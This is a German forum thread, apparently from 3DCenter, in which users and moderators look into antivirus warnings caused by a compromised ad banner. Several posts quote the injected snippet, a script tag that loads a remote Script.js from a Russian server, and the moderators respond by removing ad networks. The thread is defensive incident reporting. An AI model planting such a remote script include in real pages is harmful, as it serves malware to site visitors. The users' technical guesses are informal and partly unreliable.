Bekam hier heute schon mehrfach nach dem fertig laden einer Forenseite von NOD32 den Hinweis auf einen Skript-Virus. In der kleinen Datei wird dann auf ein weiteres Skript auf einem russischen Server verlinkt. Ich tippe mal drauf dass das über einen der Werbebanner kommt!? Hier die Analyse von VirusTotal:
http://www.virustotal.com/de/analisis/bb41ffa214cdc31db12a9b38e49ebd03301e709849a0f579d395e24005fd5d39-1279271044

MfG
Rooter

Bin ich mir nicht sicher, wenn nur ein Bruchteil der Virendienste den erkennen, ist es wahrscheinlich kein Virus. Leider ist HTML/Script-Werbung sehr anfällig dafür, als Virus falscherkannt zu werden.

Werde es trotzdem weiterleiten. Russische Server sind nun nicht unbedingt vertrauenserweckend.

habs auch 2x bekommen (avast)
danke für deine Weiterleitung

Habe jetzt erstmal den Werbeblocker von Opera für's Forum reaktiviert, bisher kam nichts mehr.

@ Lyka: Hast du die Werbung geblockt?

MfG
Rooter

ABP hab ich fürs forum deaktiviert
aktiviert ist NoScript

Kannst du das Skript mal posten? In [ code] passiert ja nix.

Werbung mit Virus? (http://www.forum-3dcenter.org/vbulletin/showthread.php?p=7208547#post7208547) war schonmal Thema.

mfg

<html><body></body></html>
<script type="text/javascript" src="http://pantscow.ru:8080/Script.js"></script>
<!--dff5359f8b7e6354898501202495afe5-->

EDIT: Seh' ich ja jetzt erst: Gehört </html> nicht ganz ans Ende!?

MfG
Rooter

<html><body></body></html>
<script type="text/javascript" src="http://pantscow.ru:8080/Script.js"></script>
<!--dff5359f8b7e6354898501202495afe5-->Ja, die sind tatsächlich böse, vgl. z. B. hier (http://blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/).

mfg

Habe nun Adcale (den Werbevermarker) erreicht, der kümmert sich nun um den Fall und informiert mich per Mail.

Ich habe nur eine Zertifikatswarnung bekommen.

Was kann ich noch tun?

Ich habe nur eine Zertifikatswarnung bekommen.

Was kann ich noch tun?Vielleicht warst du nicht betroffen?

mfg

Vielleicht warst du nicht betroffen?

mfg

Klar muss nichts, kann aber passiert sein. Es ist überhaupt das erste mal das ich im 3dc auf ein Zertifikat und dann noch ein ungültiges hingewiesen wurde. Und ich bin hier seit 2002 aktiv. ;)

hab soeben auch eine Viruswarnung bekommen.

http://www.abload.de/img/virusweu7.png (http://www.abload.de/image.php?img=virusweu7.png)

Sofern sich Adscale bis heute Abend nicht meldet, hab ich Sephirot inzwischen Anweisung gegeben, alle Adscale- und Adsense-Werbung vorbeugend rauszunehmen.

Mein avast! meldet sich ebenfalls:

http://www.abload.de/img/avast_virus0cy2.png

Ist vielleicht mal wieder an der Zeit, das Forenpasswort zu ändern.

Hab solche Meldung nicht bekommen. Werbeblocker ewig aktiviert, NoScript für 3DCenter.de sind eingeschränkt erlaubt.

Muss ich auf mein PC bangen? Ich hasse Virus!

Muss ich auf mein PC bangen? Ich hasse Virus!
Nein, wenn du einen aktuellen Virenscanner hast, nicht.

@Topic:
Freaky. Ich hab die Meldung mit der Script.js im 3Dc nicht bekommen.
Bin nun mal auf adservercentral gegangen und habe auf Login geklickt, da schlägt mein Kaspersky an, mit obiger Adressse zu pantscow.ru
Da sind scheinbar deren Server verseucht.

hab soeben auch eine Viruswarnung bekommen.

http://www.abload.de/img/virusweu7.png (http://www.abload.de/image.php?img=virusweu7.png)



Genau die hab ich seit heute auch.

Nein, wenn du einen aktuellen Virenscanner hast, nicht.

@Topic:
Freaky. Ich hab die Meldung mit der Script.js im 3Dc nicht bekommen.
Bin nun mal auf adservercentral gegangen und habe auf Login geklickt, da schlägt mein Kaspersky an, mit obiger Adressse zu pantscow.ru
Da sind scheinbar deren Server verseucht.

Ich habe Kaspersky und schlägt keinen Alarm. :(

Ich habe Kaspersky und schlägt keinen Alarm. :(
Im 3Dc hab ich den Alarm auch nicht. Keine Panik. Wie ich ja festgestellt habe, erkennt Kaspersky das Ding, wenn es geladen werden soll. :D

Wenn du deinen Viren-Scanner testen willst, also ob er überhaupt auf irgendwas reagiert:
http://www.eicar.org/anti_virus_test_file.htm
Unten die Dateien laden, sind völlig harmlos, werden aber extra von Virenscanner als Virus erkannt.

Im 3Dc hab ich den Alarm auch nicht. Keine Panik. Wie ich ja festgestellt habe, erkennt Kaspersky das Ding, wenn es geladen werden soll. :D

Wenn du deinen Viren-Scanner testen willst, also ob er überhaupt auf irgendwas reagiert:
http://www.eicar.org/anti_virus_test_file.htm
Unten die Dateien laden, sind völlig harmlos, werden aber extra von Virenscanner als Virus erkannt.

Ich vertraue da nicht, Virus zu herunterladen. Habe trotzdem Angst und weil Website Englisch ist, wie soll ich Virus wieder löschen? Mein Englisch ist nicht der Stärke. :(

Keine Panik, wir kümmern uns um die Sache.

AdScale und AdSense Werbung ist jetzt offline. Stattdessen kommt nun Werbung von Amazon.

Sauber, danke!

So, gemäß eine kleinen Suche im Web ist das zweifelsfrei ein Virus:
http://www.mobile-freiheit.net/viewtopic.php?f=70&t=8627&st=0&sk=t&sd=a&start=20

Dort sagt einer, es kommt über Java im IE. Java im FF würde dagegen problemlos sein. Könnte also eine IE-Schwachstelle sein. Erklärt, wieso es nur bei einigen auftritt.


Gemäß nachfolgender Webseite ist es eine neue, sehr frische Virenwelle, wo extra haufenweise Domains dafür angemeldet wurden - ergo ist nicht 3DC selber gekapert worden:
http://wpguru.co.uk/2010/07/the-drunkjeans-com-wordpress-hack-and-how-to-get-rid-of-it/

Nur der exakte Verbreitungsweg zu 3DC ist noch nicht zu 100% sicher. Es können sowohl Adscale als auch Google Adsense sein, wobei letzteres (regulär, derzeit alles zugunsten von Amazon abgeschaltet) nur zu 5% läuft und damit die Chancen für Adscale deutlich höher sind. Das in den vorherigen Screenshots die Domain Adservercentral.info auftaucht, spricht aber für einen Werbevermarkter, der gekapert wurde und der über Adscale oder Adsense zu uns bekommen ist.

Sofern ab sofort keine Viren-Meldungen mehr auftreten, kann es nur an Adscale oder Adsense liegen, weil dies ist die einzige Änderung, die wir gemacht haben.


Ich bitte schonmal vorab um Entschuldigung für alle Unanehmlichkeiten! Sobald weitere Informationen vorliegen, werden diese hier gepostet werden.

Das nächste mal sollten wir den Typen von der c't engagieren, der scheints schon etwas drauf zu haben :cool::D

Klick (http://www.heise.de/security/artikel/Tatort-Internet-Alarm-beim-Pizzadienst-1017983.html)

krass .... naja antivir hat sich gestern nicht gemeldet, ob das gut ist??

k.a. bei mir auch nicht. Aber das kann an der Art der Werbung hängen - sie kommt über einen Werbevermarkter, wo dutzende Werbungen in Rotation laufen. Wenn da eine verseucht ist, dann kommt sie eben nur 1x in hundert Abrufen.

naja, hab erstmal mein system gescannt und anschließend den housecall (http://housecall.trendmicro.com/de/) laufen lassen ... alles sauber.

ganz schön perfide dieser virus-scheiss ;(

Ich habe Kaspersky und schlägt keinen Alarm. :(Wenn du Werbung eh geblockt hast wird das bei dir ja gar nicht geladen.

Dort sagt einer, es kommt über Java im IE. Java im FF würde dagegen problemlos sein. Könnte also eine IE-Schwachstelle sein. Erklärt, wieso es nur bei einigen auftritt.Bei mir ist es mit Opera aufgetreten (allerdings noch die alte 10.10er).

Kurios auch: Mit einem Downloadmanager habe ich diese script.js von dem russischen Server runtergeladen. Die war nur 6 Bytes groß und enthielt blos drei Zeilenumbrüche, also leer. Könnte aber auch sein dass die für solche Fälle eine Browserweiche vorgeschaltet haben... :upara:

MfG
Rooter

Kurios auch: Mit einem Downloadmanager habe ich diese script.js von dem russischen Server runtergeladen. Die war nur 6 Bytes groß und enthielt blos drei Zeilenumbrüche, also leer. Könnte aber auch sein dass die für solche Fälle eine Browserweiche vorgeschaltet haben... :upara:

MfG
Rooter
Ich vermute, das Ding erwartet einen bestimmten Referer.

Habe die Meldung schon über einen Monat hier auf der Seite.
Allerdings kommt das nicht immer.

Nutze aber auch keine Antiviren Software :freak:

Jedenfalls kam es immer nur bei einem bestimmten Banner das nicht geladen werden konnte.
Und ich soll mir ein Zertifikat runterladen....

Habe ich natürlich abgebrochen.

Kurze Frage. Mit einem aktuellen Browser sollte doch ein JavaScript keinen Schaden ausrichten können? Normalerweise hat JavaScript ja keinen Zugriff auf lokale Dateien. Von daher müsste schon der Browser eine Sicherheitslücke haben, und vermutlich wird der Virus wohl bekannte Sicherheitslücken älterer Versionen nutzen.

Oder übersehe ich da etwas?

Eigentlich ja, aber tödlich sicher bin ich mir nicht.

Aber daß es nur bei einem Bruchteil der User gekommen ist, bestätigt die Idee, daß es nur in Kombination mit einem bestimmten Browser geht - ergo unter Ausnutzung einer Sicherheitslücke dieses speziellen Browsers. Irgendjemand sagte ja IE + Java.

Bei mir kam der Dreck in Verbindung mit dem Firefox + Gdata immer dann, wenn ich meine Abos in der Email direkt angeklickt habe.

Bei mir war es unter Firefox, IE nutze ich nicht.

Nunja, das bestätigt leider nur eindrucksvoll, wie wichtig es inzwischen ist, Browser mit permanent aktivierten Addons wie z. B. NoScript oder auch generelle Werbeblocker einzusetzen.

Wohlwissend, dass sich Seiten und Foren mit dieser Art von Werbung (außer man macht es wie CB - was mir aber noch übler missfällt) finanzieren,
meine ich schon länger "Safety First".

Jedenfalls genügt es heutzutage nichtmehr, sich alleine auf den Virenscanner zu verlassen.

Also das mit dem Adservercentral.info kann ich erstmal entschärfen, dies ist in der Tat ein Fehlalarm:
http://www.goolive.de/forum/virenwarnung-goooooo-seite-193689-1.html


Bleibt die Sache mit dem russischen Server offen. Der ist nun ziemlich sicher gekapert worden - aber wie der zu uns gekommen ist, ist komplett unklar.


Für den Augenblick machen wir mal Adscale-Werbung wieder drauf. Wenn wieder etwas ist, unbedingt hier melden, wir beobachten den Thread.

*thread ausgrab*

Bin bisher von den Meldungen verschont geblieben, heute Morgen hat's bei mir aber auch geknallt...

Besuche standardmäßig eigentlich nur das Forum, dieser Thread hier hat mich aber dann doch mal auf die Hauptseite wechseln lassen: http://www.forum-3dcenter.org/vbulletin/showthread.php?t=520647

Im gleich Moment ploppte Folgendes bei mir auf:

http://img23.imageshack.us/img23/9507/virusq.jpg

Scheint wohl irgendwas mit Werbung zu tun haben, was ich sosnt nicht registriere, weil ich im Forum den Opera-Blocker aktiviert habe.

Any comments?

Kann das Bild nicht sehen.

Hm, bei mir wird's korrekt angezeigt... :(

Geht der direkte Link? -> http://img23.imageshack.us/img23/9507/virusq.jpg